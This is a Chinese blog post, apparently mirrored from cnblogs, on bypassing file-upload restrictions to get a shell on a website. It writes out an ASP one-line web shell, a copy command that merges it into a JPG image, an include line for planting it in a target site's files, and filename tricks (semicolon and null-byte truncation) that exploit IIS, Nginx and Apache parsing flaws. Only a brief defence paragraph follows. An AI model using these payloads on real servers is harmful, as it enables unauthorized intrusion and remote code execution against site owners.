zoukankan      html  css  js  c++  java
  • 突破文件上传漏洞

    1.利用图片捆绑木马,绕过文件类型判断

    有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会把一句话放在图片里面,写成1.asp;.jpg 1.asp;jpg的格式上传上去,这样上传的时候系统检测是图片,然后在上传之后,会把这个文件当asp文件来处理,那么如何用cmd来制作一句话木马呢.

    利用copy命令
    详细操作为
    1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)
    2.<%eval request("keio")%>           存为1.asp(就是一句话木马)
    3.copy 1.jpg /b + 1.asp /a  2.jpg      存为1.bat文件

    解释一下代码
    复制当前目录下的 1.jpg 图片和当前目录下的 1.asp 文件并以ASCII代码的方式合并为 2.jpg 图片
    运行 1.bat 就会出现一个图片 2.jpg
    而这个2.jpg就是已经做好的木马了

    把一句话木马合并到了图片里以后
    再把以下代码插入目标网站的任意文件即可
    <% #include files="2.jpg"%>

    防御方法:主要是防止iis将图片解析成asp,aspx,php等进行执行,图片马是配合解析漏洞或者文件包含才能正常执行,iis之前版本存在解析漏洞

    IS6.0 的解析漏洞 :1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg
    IIS 7.0/IIS 7.5/ Nginx <8.03 畸形解析 1.jpg/.php
    Nginx <8.03 空字节代码执行漏洞 1.jpg%00.php
    Apache 解析漏洞 .php.一个无效后缀
    还有就是 Windows 下的各种截断了,因为 win 环境下不允许一些符号命名文件,所以可以造成截断文件名的效果

  • 相关阅读:
    监督学习
    第一个应用:鸢尾花分类
    第一章 计算机系统漫游
    前言
    python批量下载验证码,用来做验证码处理
    windows下安装tesserocr
    python 爬虫之requests爬取页面图片的url,并将图片下载到本地
    electron实现透明点投的方法
    css之实现下拉框自上而下展开动画效果&&自下而上收起动画效果
    react项目中canvas之画形状(圆形,椭圆形,方形)
  • 原文地址:https://www.cnblogs.com/l1pe1/p/8410341.html
Copyright © 2011-2022 走看看